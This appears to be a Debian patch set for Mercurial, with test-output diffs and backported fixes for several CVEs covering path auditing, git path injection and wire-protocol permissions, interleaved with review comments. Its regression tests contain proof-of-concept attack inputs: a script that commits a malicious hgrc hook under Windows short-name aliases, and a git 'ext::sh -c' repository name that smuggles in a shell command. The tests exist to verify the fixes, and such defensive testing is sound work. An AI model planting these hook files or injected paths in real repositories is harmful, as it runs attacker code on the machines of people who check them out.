@@ -882,15 +907,15 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test attach for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -901,7 +926,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -910,7 +935,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -930,15 +955,15 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test attach for single patch (quoted-printable): - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 4 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 4 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -949,7 +974,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -958,7 +983,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable 
@@ -994,15 +1019,15 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test attach and body for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a --body -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a --body -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -1013,7 +1038,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1032,7 +1057,7 @@ @@ -0,0 +1,1 @@ +c - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1052,11 +1077,11 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test attach for multiple patches: $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a \ - > -r 0:1 -r 4 + > -r 0:1 -r 4 | $FILTERBOUNDARY this patch series consists of 3 patches. @@ -1077,7 +1102,7 @@ displaying [PATCH 1 of 3] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 3] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -1090,7 +1115,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1099,7 +1124,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1119,9 +1144,9 @@ 
@@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 3] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 3] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -1134,7 +1159,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1143,7 +1168,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1163,9 +1188,9 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 3 of 3] long line ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 3 of 3] long line X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -1178,7 +1203,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1187,7 +1212,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable @@ -1223,7 +1248,7 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test intro for single patch: $ hg email --date '1970-1-1 0:1' -n --intro -f quux -t foo -c bar -s test \ 
@@ -1485,12 +1510,13 @@ $ hg tag -r2 two two.diff test inline for single named patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ + > -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -1501,7 +1527,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1521,10 +1547,11 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test inline for multiple named/unnamed patches: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 0:1 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ + > -r 0:1 | $FILTERBOUNDARY this patch series consists of 2 patches. @@ -1545,7 +1572,7 @@ displaying [PATCH 1 of 2] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 2] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -1558,7 +1585,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1578,9 +1605,9 @@ @@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 2] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 2] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -1593,7 +1620,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit 
@@ -1613,7 +1640,7 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) test inreplyto: @@ -1805,9 +1832,11 @@ +b -test single flag for single patch: +test single flag for single patch (and no warning when not mailing dirty rev): + $ hg up -qr1 + $ echo dirt > a $ hg email --date '1970-1-1 0:1' -n --flag fooFlag -f quux -t foo -c bar -s test \ - > -r 2 + > -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. @@ -1839,7 +1868,7 @@ +c -test single flag for multiple patches: +test single flag for multiple patches (and warning when mailing dirty rev): $ hg email --date '1970-1-1 0:1' -n --flag fooFlag -f quux -t foo -c bar -s test \ > -r 0:1 this patch series consists of 2 patches. @@ -1919,6 +1948,8 @@ @@ -0,0 +1,1 @@ +b + $ hg revert --no-b a + $ hg up -q test multiple flags for single patch: $ hg email --date '1970-1-1 0:1' -n --flag fooFlag --flag barFlag -f quux -t foo \ @@ -2127,7 +2158,7 @@ $ hg ci -md -d '4 0' $ echo d >> d $ hg ci -mdd -d '5 0' - $ hg --config extensions.graphlog= glog --template "{rev}:{node|short} {desc|firstline}\n" + $ hg log -G --template "{rev}:{node|short} {desc|firstline}\n" @ 10:3b6f1ec9dde9 dd | o 9:2f9fa9b998c5 d debian/patches/CVE-2014-9390.pt40000664000000000000000000000532312540341731012656 0ustar Backport of: Origin: 6dad422ecc5adb63d9fa649eeb8e05a5f9bc4900 (backport) # HG changeset patch # User Matt Mackall # Date 1418933908 21600 # Node ID 6dad422ecc5adb63d9fa649eeb8e05a5f9bc4900 # Parent c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c pathauditor: check for Windows shortname aliases Index: mercurial-2.8.2/mercurial/scmutil.py =================================================================== --- mercurial-2.8.2.orig/mercurial/scmutil.py +++ mercurial-2.8.2/mercurial/scmutil.py 
@@ -150,6 +150,13 @@ class pathauditor(object): or _lowerclean(parts[0]) in ('.hg', '.hg.', '') or os.pardir in parts): raise util.Abort(_("path contains illegal component: %s") % path) + # Windows shortname aliases + for p in parts: + if "~" in p: + first, last = p.split("~", 1) + if last.isdigit() and first.upper() in ["HG", "HG8B6C"]: + raise util.Abort(_("path contains illegal component: %s") + % path) if '.hg' in _lowerclean(path): lparts = [_lowerclean(p.lower()) for p in parts] for p in '.hg', '.hg.': Index: mercurial-2.8.2/tests/test-commit.t =================================================================== --- mercurial-2.8.2.orig/tests/test-commit.t +++ mercurial-2.8.2/tests/test-commit.t 
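Review bot: The new loop in pathauditor compares against the literals `"HG"` and `"HG8B6C"` without saying where they come from, which makes the list hard to maintain or extend. A comment above `for p in parts:` such as `# 8.3 short names Windows can assign to ".hg": HG~N, and presumably the hashed form HG8B6C~N` would document it (the origin of the second name is inferred, not shown on the page). The `.hg` check just above goes through `_lowerclean`, while this one inspects the raw component with only `.upper()`; it is worth confirming that difference is intended. The enclosing method starts and ends outside the hunk.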
@@ -323,4 +323,39 @@ verify pathauditor blocks evil filepaths abort: path contains illegal component: .h\xe2\x80\x8cg/hgrc (esc) [255] - $ cd .. + $ hg rollback -f + repository tip rolled back to revision 1 (undo commit) + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = "HG~1/hgrc" + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: HG~1/hgrc + [255] + + $ hg rollback -f + repository tip rolled back to revision 1 (undo commit) + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = "HG8B6C~2/hgrc" + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: HG8B6C~2/hgrc + [255] + debian/patches/for_upstream__dont_rm_usr_bin_python_when_running_testsuite.patch0000664000000000000000000000152312231311676026246 0ustar Author: Javi Merino Description: Don't rm /usr/bin/python when running the testsuite mercurial tries to delete /usr/bin/python when running the testsuite with "make tests TESTFLAGS=--with-hg=/usr/bin/hg". If you're doing it as a user, the testsuite fails because it can't remove it. . This fixes it at least in Debian. I'm unsure about other systems. Bug: http://bz.selenic.com/show_bug.cgi?id=4045 --- a/tests/run-tests.py +++ b/tests/run-tests.py 
@@ -430,7 +430,7 @@ def usecorrectpython(): sys.executable) mypython = os.path.join(BINDIR, pyexename) try: - if os.readlink(mypython) == sys.executable: + if (mypython == sys.executable) or (os.readlink(mypython) == sys.executable): return os.unlink(mypython) except OSError, err: debian/patches/CVE-2016-3105.patch0000664000000000000000000000512513375256143013245 0ustar # HG changeset patch # User Blake Burkhart # Date 1460001466 18000 # Node ID a56296f55a5e1038ea5016dace2076b693c28a56 # Parent 27ad6cae7785b59f918f5e3ed33a2f1e88a60d4f convert: pass absolute paths to git (SEC) Fixes CVE-2016-3105 (1/1). Previously, it was possible for the repository path passed to git-ls-remote to be misinterpreted as a URL. Always passing an absolute path to git is a simple way to avoid this. diff -r 27ad6cae7785 -r a56296f55a5e hgext/convert/git.py --- a/hgext/convert/git.py Sun May 01 13:52:26 2016 -0500 +++ b/hgext/convert/git.py Wed Apr 06 22:57:46 2016 -0500 @@ -64,6 +64,10 @@ class convert_git(converter_source, commandline): super(convert_git, self).__init__(ui, path, rev=rev) commandline.__init__(self, ui, 'git') + # Pass an absolute path to git to prevent from ever being interpreted + # as a URL + path = os.path.abspath(path) + if os.path.isdir(path + "/.git"): path += "/.git" if not os.path.exists(path + "/objects"): diff -r 27ad6cae7785 -r a56296f55a5e tests/test-convert-git.t --- a/tests/test-convert-git.t Sun May 01 13:52:26 2016 -0500 +++ b/tests/test-convert-git.t Wed Apr 06 22:57:46 2016 -0500 
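Review bot: In usecorrectpython() in tests/run-tests.py the new guard `mypython == sys.executable` is a plain string comparison, so the same interpreter reached through a different spelling (a relative path, a doubled slash, a symlinked directory) still falls through to `os.unlink(mypython)`. Comparing resolved paths, `if os.path.realpath(mypython) == os.path.realpath(sys.executable):`, covers both the identical-file case and the symlink case that `os.readlink` handled. The function starts and ends outside the hunk, so whether later code depends on the `OSError` raised by `readlink` cannot be checked from here.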
@@ -410,3 +410,21 @@ test for escaping the repo name (CVE-2016-3069) updating bookmarks $ test -f COMMAND-INJECTION [1] + +test for safely passing paths to git (CVE-2016-3105) + + $ git init 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' + Initialized empty Git repository in $TESTTMP/ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #/.git/ + $ cd 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' + $ git commit -q --allow-empty -m 'empty' + $ cd .. + $ hg convert 'ext::sh -c echo% pwned% >GIT-EXT-COMMAND-INJECTION% #' 'converted-git-ext' + initializing destination converted-git-ext repository + scanning source... + sorting... + converting... + 0 empty + updating bookmarks + $ test -f GIT-EXT-COMMAND-INJECTION + [1] + diff -r 27ad6cae7785 -r a56296f55a5e tests/test-convert.t --- a/tests/test-convert.t Sun May 01 13:52:26 2016 -0500 +++ b/tests/test-convert.t Wed Apr 06 22:57:46 2016 -0500 @@ -358,7 +358,7 @@ running from a devel copy, not a temp installation assuming destination emptydir-hg initializing destination emptydir-hg repository emptydir does not look like a CVS checkout - emptydir does not look like a Git repository + $TESTTMP/emptydir does not look like a Git repository emptydir does not look like a Subversion repository emptydir is not a local Mercurial repository emptydir does not look like a darcs repository debian/patches/deb_specific__support_templates_in_fsh.patch0000664000000000000000000000062012261301466021575 0ustar Author: Vernon Tang Description: Support installation of templates in FHS. Forwarded: not-needed --- a/mercurial/templater.py +++ b/mercurial/templater.py 
@@ -375,7 +375,7 @@ funcs = { # template engine -path = ['templates', '../templates'] +path = ['templates', '../templates', '/usr/share/mercurial/templates'] stringify = templatefilters.stringify def _flatten(thing): debian/patches/CVE-2018-1000132.patch0000664000000000000000000015340413375535170013471 0ustar Description: backport of 4.3 patch to 3.2 This was created from the Mozilla patchset using: something like "hg diff -r db527ae12671 -r 86f9a022ccb8" to generate the original patch, which was then backported. The get-with-headers.py script was taken verbatim from the 4.3 version instead of trying to patch the 3.1 version. Last-update: 2018-06-27 From: Antoine Beaupré Origin: https://hg.mozilla.org/users/gszorc_mozilla.com/hg --- a/hgext/largefiles/uisetup.py +++ b/hgext/largefiles/uisetup.py @@ -11,7 +11,7 @@ from mercurial import archival, cmdutil, commands, extensions, filemerge, hg, \ httppeer, merge, scmutil, sshpeer, wireproto, revset from mercurial.i18n import _ -from mercurial.hgweb import hgweb_mod, webcommands +from mercurial.hgweb import webcommands from mercurial.subrepo import hgsubrepo import overrides @@ -134,9 +134,10 @@ def uisetup(ui): # make putlfile behave the same as push and {get,stat}lfile behave # the same as pull w.r.t. permissions checks - hgweb_mod.perms['putlfile'] = 'push' - hgweb_mod.perms['getlfile'] = 'pull' - hgweb_mod.perms['statlfile'] = 'pull' + wireproto.permissions['putlfile'] = 'push' + wireproto.permissions['getlfile'] = 'pull' + wireproto.permissions['statlfile'] = 'pull' + wireproto.permissions['lheads'] = 'pull' extensions.wrapfunction(webcommands, 'decodepath', overrides.decodepath) --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py 
@@ -7,7 +7,7 @@ # GNU General Public License version 2 or any later version. import os -from mercurial import ui, hg, hook, error, encoding, templater, util, repoview +from mercurial import ui, hg, hook, error, encoding, templater, util, repoview, wireproto from mercurial.templatefilters import websub from mercurial.i18n import _ from common import get_stat, ErrorResponse, permhooks, caching @@ -16,15 +16,8 @@ from common import HTTP_NOT_FOUND, HTTP_SERVER_ERROR from request import wsgirequest import webcommands, protocol, webutil, re -perms = { - 'changegroup': 'pull', - 'changegroupsubset': 'pull', - 'getbundle': 'pull', - 'stream_out': 'pull', - 'listkeys': 'pull', - 'unbundle': 'push', - 'pushkey': 'push', -} +# Aliased for API compatibility. +perms = wireproto.permissions def makebreadcrumb(url, prefix=''): '''Return a 'URL breadcrumb' list @@ -167,8 +160,13 @@ class hgweb(object): try: if query: raise ErrorResponse(HTTP_NOT_FOUND) - if cmd in perms: - self.check_perm(req, perms[cmd]) + + req.checkperm = lambda op: self.check_perm(req, op) + # Assume commands with no defined permissions are writes / + # for pushes. This is the safest from a security perspective + # because it doesn't allow commands with undefined semantics + # from bypassing permissions checks. + req.checkperm(perms.get(cmd, 'push')) return protocol.call(self.repo, req, cmd) except ErrorResponse, inst: # A client that sends unbundle without 100-continue will --- a/mercurial/hgweb/protocol.py +++ b/mercurial/hgweb/protocol.py @@ -17,6 +17,7 @@ class webproto(object): self.req = req self.response = '' self.ui = ui + self.checkperm = req.checkperm def getargs(self, args): knownargs = self._args() data = {} --- a/mercurial/wireproto.py +++ b/mercurial/wireproto.py 
@@ -11,6 +11,10 @@ from node import bin, hex import changegroup as changegroupmod import peer, error, encoding, util, store +# Maps wire protocol name to operation type. This is used for permissions +# checking. +permissions = {} + # abstract batching support class future(object): @@ -363,6 +367,15 @@ def options(cmd, keys, others): % (cmd, ",".join(others))) return opts +def wireprotocommand(name, args=''): + """decorator for wire protocol command""" + def register(func): + commands[name] = (func, args) + return func + return register + +# TODO define a more appropriate permissions type to use for this. +permissions['batch'] = 'pull' def batch(repo, proto, cmds, others): repo = repo.filtered("served") res = [] @@ -374,6 +387,17 @@ def batch(repo, proto, cmds, others): n, v = a.split('=') vals[n] = unescapearg(v) func, spec = commands[op] + + # If the protocol supports permissions checking, perform that + # checking on each batched command. + # TODO formalize permission checking as part of protocol interface. + if util.safehasattr(proto, 'checkperm'): + # Assume commands with no defined permissions are writes / for + # pushes. This is the safest from a security perspective because + # it doesn't allow commands with undefined semantics from + # bypassing permissions checks. + proto.checkperm(permissions.get(op, 'push')) + if spec: keys = spec.split() data = {} @@ -394,6 +418,7 @@ def batch(repo, proto, cmds, others): res.append(escapearg(result)) return ';'.join(res) +permissions['between'] = 'pull' def between(repo, proto, pairs): pairs = [decodelist(p, '-') for p in pairs.split(" ")] r = [] @@ -401,6 +426,7 @@ def between(repo, proto, pairs): r.append(encodelist(b) + "\n") return "".join(r) +permissions['branchmap'] = 'pull' def branchmap(repo, proto): branchmap = repo.branchmap() heads = [] 
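Review bot: In batch() in mercurial/wireproto.py the per-command check runs only when `util.safehasattr(proto, 'checkperm')` is true, so a protocol object that lacks the attribute executes every batched sub-command with no permission check at all; the `'push'` default protects only protocols that opted in. If that is intended for transports that authorise elsewhere, a comment saying so would help, since the TODO does not state it. Separately, `wireprotocommand` registers a command without touching `permissions`, while each built-in command gets a hand-written `permissions[...] = ...` line in this and the later wireproto.py hunks. Letting the decorator take the operation, `def wireprotocommand(name, args='', permission='push'):` with `permissions[name] = permission` inside `register`, would keep the two tables from drifting apart. The bodies of batch() and the other commands continue outside the hunks.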
@@ -410,6 +436,7 @@ def branchmap(repo, proto): heads.append('%s %s' % (branchname, branchnodes)) return '\n'.join(heads) +permissions['branches'] = 'pull' def branches(repo, proto, nodes): nodes = decodelist(nodes) r = [] @@ -417,6 +444,7 @@ def branches(repo, proto, nodes): r.append(encodelist(b) + "\n") return "".join(r) +permissions['capabilities'] = 'pull' def capabilities(repo, proto): caps = ('lookup changegroupsubset branchmap pushkey known getbundle ' 'unbundlehash batch').split() @@ -434,22 +462,26 @@ def capabilities(repo, proto): caps.append('httpheader=1024') return ' '.join(caps) +permissions['changegroup'] = 'pull' def changegroup(repo, proto, roots): nodes = decodelist(roots) cg = repo.changegroup(nodes, 'serve') return streamres(proto.groupchunks(cg)) +permissions['changegroupsubset'] = 'pull' def changegroupsubset(repo, proto, bases, heads): bases = decodelist(bases) heads = decodelist(heads) cg = repo.changegroupsubset(bases, heads, 'serve') return streamres(proto.groupchunks(cg)) +permissions['debugwireargs'] = 'pull' def debugwireargs(repo, proto, one, two, others): # only accept optional args from the known set opts = options('debugwireargs', ['three', 'four'], others) return repo.debugwireargs(one, two, **opts) +permissions['getbundle'] = 'pull' def getbundle(repo, proto, others): opts = options('getbundle', ['heads', 'common', 'bundlecaps'], others) for k, v in opts.iteritems(): @@ -460,10 +492,12 @@ def getbundle(repo, proto, others): cg = repo.getbundle('serve', **opts) return streamres(proto.groupchunks(cg)) +permissions['heads'] = 'pull' def heads(repo, proto): h = repo.heads() return encodelist(h) + "\n" +permissions['hello'] = 'pull' def hello(repo, proto): '''the hello command returns a set of lines describing various interesting things about the server, in an RFC822-like format. 
@@ -474,12 +508,14 @@ def hello(repo, proto): ''' return "capabilities: %s\n" % (capabilities(repo, proto)) +permissions['listkeys'] = 'pull' def listkeys(repo, proto, namespace): d = repo.listkeys(encoding.tolocal(namespace)).items() t = '\n'.join(['%s\t%s' % (encoding.fromlocal(k), encoding.fromlocal(v)) for k, v in d]) return t +permissions['lookup'] = 'pull' def lookup(repo, proto, key): try: k = encoding.tolocal(key) @@ -491,9 +527,11 @@ def lookup(repo, proto, key): success = 0 return "%s %s\n" % (success, r) +permissions['known'] = 'pull' def known(repo, proto, nodes, others): return ''.join(b and "1" or "0" for b in repo.known(decodelist(nodes))) +permissions['pushkey'] = 'push' def pushkey(repo, proto, namespace, key, old, new): # compatibility with pre-1.8 clients which were accidentally # sending raw binary nodes rather than utf-8-encoded hex @@ -532,6 +570,7 @@ def _walkstreamfiles(repo): # this is it's own function so extensions can override it return repo.store.walk() +permissions['stream_out'] = 'pull' def stream(repo, proto): '''If the server supports streaming clone, it advertises the "stream" capability with a value representing the version and flags of the repo @@ -598,6 +637,7 @@ def stream(repo, proto): return streamres(streamer(repo, entries, total_bytes)) +permissions['unbundle'] = 'push' def unbundle(repo, proto, heads): their_heads = decodelist(heads) --- a/tests/get-with-headers.py +++ b/tests/get-with-headers.py @@ -3,6 +3,7 @@ """This does HTTP GET requests given a host:port and path and returns a subset of the headers plus the body of the result.""" +import argparse import httplib, sys try: 
@@ -12,16 +13,29 @@ try: except ImportError: pass -twice = False -if '--twice' in sys.argv: - sys.argv.remove('--twice') - twice = True -headeronly = False -if '--headeronly' in sys.argv: - sys.argv.remove('--headeronly') - headeronly = True +stdout = getattr(sys.stdout, 'buffer', sys.stdout) -reasons = {'Not modified': 'Not Modified'} # python 2.4 +parser = argparse.ArgumentParser() +parser.add_argument('--twice', action='store_true') +parser.add_argument('--headeronly', action='store_true') +parser.add_argument('--json', action='store_true') +parser.add_argument('--hgproto') +parser.add_argument('--requestheader', nargs='*', default=[], + help='Send an additional HTTP request header. Argument ' + 'value is
=') +parser.add_argument('--bodyfile', + help='Write HTTP response body to a file') +parser.add_argument('host') +parser.add_argument('path') +parser.add_argument('show', nargs='*') + +args = parser.parse_args() + +twice = args.twice +headeronly = args.headeronly +formatjson = args.json +hgproto = args.hgproto +requestheaders = args.requestheader tag = None def request(host, path, show): 
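Review bot: `--requestheader` is declared with `nargs='*'`, which makes it consume every bare argument that follows it, so it only parses correctly when given after `host` and `path`, and a repeated occurrence replaces the earlier one instead of adding to it. Declaring it as `parser.add_argument('--requestheader', action='append', default=[], ...)` takes exactly one `name=value` per occurrence and is order-independent. The existing test invocations, which pass the flag once after the path, would still parse the same way.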
@@ -30,31 +44,58 @@ def request(host, path, show): headers = {} if tag: headers['If-None-Match'] = tag + if hgproto: + headers['X-HgProto-1'] = hgproto + + for header in requestheaders: + key, value = header.split('=', 1) + headers[key] = value conn = httplib.HTTPConnection(host) conn.request("GET", '/' + path, None, headers) response = conn.getresponse() - print response.status, reasons.get(response.reason, response.reason) + stdout.write(b'%d %s\n' % (response.status, + response.reason.encode('ascii'))) if show[:1] == ['-']: show = sorted(h for h, v in response.getheaders() if h.lower() not in show) for h in [h.lower() for h in show]: if response.getheader(h, None) is not None: - print "%s: %s" % (h, response.getheader(h)) + stdout.write(b"%s: %s\n" % (h.encode('ascii'), + response.getheader(h).encode('ascii'))) if not headeronly: - print - if response.status != 500: - data = response.read() - sys.stdout.write(data) + stdout.write(b'\n') + data = response.read() + + if args.bodyfile: + bodyfh = open(args.bodyfile, 'wb') + else: + bodyfh = stdout + + # Pretty print JSON. This also has the beneficial side-effect + # of verifying emitted JSON is well-formed. + if formatjson: + # json.dumps() will print trailing newlines. Eliminate them + # to make tests easier to write. + data = json.loads(data) + lines = json.dumps(data, sort_keys=True, indent=2).splitlines() + for line in sorted(lines): + bodyfh.write(line.rstrip()) + bodyfh.write(b'\n') + else: + bodyfh.write(data) + + if args.bodyfile: + bodyfh.close() - if twice and response.getheader('ETag', None): - tag = response.getheader('ETag') + if twice and response.getheader('ETag', None): + tag = response.getheader('ETag') return response.status -status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) +status = request(args.host, args.path, args.show) if twice: - status = request(sys.argv[1], sys.argv[2], sys.argv[3:]) + status = request(args.host, args.path, args.show) if 200 <= status <= 305: sys.exit(0) 
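Review bot: The `--json` branch calls `json.loads` and `json.dumps`, but the only import added to this file is `import argparse` in the first hunk, so unless `json` is imported in lines outside the hunks the flag fails with a NameError on first use. Adding `import json` next to `import argparse` fixes it. Separately, `key, value = header.split('=', 1)` raises an unhelpful ValueError when a `--requestheader` value has no `=`; a short explicit error naming the offending argument would make a mistyped test invocation easier to diagnose.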
--- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -364,6 +364,7 @@ def createenv(options, testtmp, threadtmp, port): env["HGPORT"] = str(port) env["HGPORT1"] = str(port + 1) env["HGPORT2"] = str(port + 2) + env["LOCALIP"] = "127.0.0.1" env["HGRCPATH"] = os.path.join(threadtmp, '.hgrc') env["DAEMON_PIDS"] = os.path.join(threadtmp, 'daemon.pids') env["HGEDITOR"] = sys.executable + ' -c "import sys; sys.exit(0)"' --- /dev/null +++ b/tests/test-http-permissions.t 
@@ -0,0 +1,1499 @@ +#require killdaemons + + $ cat > fakeremoteuser.py << EOF + > import os + > from mercurial.hgweb import hgweb_mod + > from mercurial import wireproto + > class testenvhgweb(hgweb_mod.hgweb): + > def __call__(self, env, respond): + > # Allow REMOTE_USER to define authenticated user. + > if r'REMOTE_USER' in os.environ: + > env[r'REMOTE_USER'] = os.environ[r'REMOTE_USER'] + > # Allow REQUEST_METHOD to override HTTP method + > if r'REQUEST_METHOD' in os.environ: + > env[r'REQUEST_METHOD'] = os.environ[r'REQUEST_METHOD'] + > return super(testenvhgweb, self).__call__(env, respond) + > hgweb_mod.hgweb = testenvhgweb + > + > @wireproto.wireprotocommand('customreadnoperm') + > def customread(repo, proto): + > return b'read-only command no defined permissions\n' + > @wireproto.wireprotocommand('customwritenoperm') + > def customwritenoperm(repo, proto): + > return b'write command no defined permissions\n' + > wireproto.permissions['customreadwithperm'] = 'pull' + > @wireproto.wireprotocommand('customreadwithperm') + > def customreadwithperm(repo, proto): + > return b'read-only command w/ defined permissions\n' + > wireproto.permissions['customwritewithperm'] = 'push' + > @wireproto.wireprotocommand('customwritewithperm') + > def customwritewithperm(repo, proto): + > return b'write command w/ defined permissions\n' + > EOF + + $ cat >> $HGRCPATH << EOF + > [extensions] + > fakeremoteuser = $TESTTMP/fakeremoteuser.py + > strip = + > EOF + + $ hg init test + $ cd test + $ echo a > a + $ hg ci -Ama + adding a + $ cd .. 
